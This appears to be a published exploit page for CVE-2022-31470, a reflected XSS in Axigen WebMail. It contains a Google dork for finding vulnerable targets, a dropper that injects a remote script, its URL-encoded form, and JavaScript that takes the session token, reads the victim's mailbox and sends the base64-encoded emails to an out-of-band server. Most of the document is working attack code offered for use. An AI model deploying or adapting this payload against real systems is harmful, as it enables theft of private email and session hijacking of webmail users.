Share
## https://sploitus.com/exploit?id=A2F5FCAA-AD2F-55C3-89ED-82A2480B7469
# Exploit Title: Axigen < 10.3.3.47, 10.2.3.12 - Reflected XSS
### Google Dork: inurl:passwordexpired=yes
### Date: 2023-08-21
### Exploit Author: AmirZargham
### Vendor Homepage: https://www.axigen.com/
### Software Link: https://www.axigen.com/mail-server/download/
### Version: (10.5.0โ4370c946) and older version of Axigen WebMail
### Tested on: firefox,chrome
### CVE: CVE-2022-31470
Exploit
We use the second Reflected XSS to exploit this vulnerability, create a
malicious link, and steal user emails.
Dropper code
This dropper code, loads and executes JavaScript exploit code from a remote
server.
```javascript
');
x = document.createElement('script');
x.src = 'https://example.com/exploit.js';
window.addEventListener('DOMContentLoaded',function y(){
document.body.appendChild(x)
})//
```
Encoded form
`
/index.hsp?m=%27)%3Bx%3Ddocument.createElement(%27script%27)%3Bx.src%3D%27
https://example.com/exploit.js%27%3Bwindow.addEventListener(%27DOMContentLoaded%27,function+y(){document.body.appendChild(x)})//
`
Exploit code
```javascript
xhr1 = new XMLHttpRequest(), xhr2 = new XMLHttpRequest(), xhr3 = new
XMLHttpRequest();
oob_server = 'https://example.com/';
var script_tag = document.createElement('script');
xhr1.open('GET', '/', true);
xhr1.onreadystatechange = () => {
if (xhr1.readyState === XMLHttpRequest.DONE) {
_h_cookie = new URL(xhr1.responseURL).search.split("=")[1];
xhr2.open('PATCH', `/api/v1/conversations/MQ/?_h=${_h_cookie}`,
true);
xhr2.setRequestHeader('Content-Type', 'application/json');
xhr2.onreadystatechange = () => {
if (xhr2.readyState === XMLHttpRequest.DONE) {
if (xhr2.status === 401){
script_tag.src =
`${oob_server}?status=session_expired&domain=${document.domain}`;
document.body.appendChild(script_tag);
} else {
resp = xhr2.responseText;
folderId = JSON.parse(resp)["mails"][0]["folderId"];
xhr3.open('GET',
`/api/v1/conversations?folderId=${folderId}&_h=${_h_cookie}`, true);
xhr3.onreadystatechange = () => {
if (xhr3.readyState === XMLHttpRequest.DONE) {
emails = xhr3.responseText;
script_tag.src =
`${oob_server}?status=ok&domain=${document.domain}&emails=${btoa(emails)}`;
document.body.appendChild(script_tag);
}
};
xhr3.send();
}
}
};
var body = JSON.stringify({isUnread: false});
xhr2.send(body);
}
};
xhr1.send();
```
Combining dropper and exploit
You can host the exploit code somewhere and then address it in the dropper
code.
#### Published in: [exploit-db](https://www.exploit-db.com/search?e_author=amirzargham).
#### Published in: [0day.today](https://0day.today/author/46852).
#### Published in: [packet storm](https://packetstormsecurity.com/files/author/16843).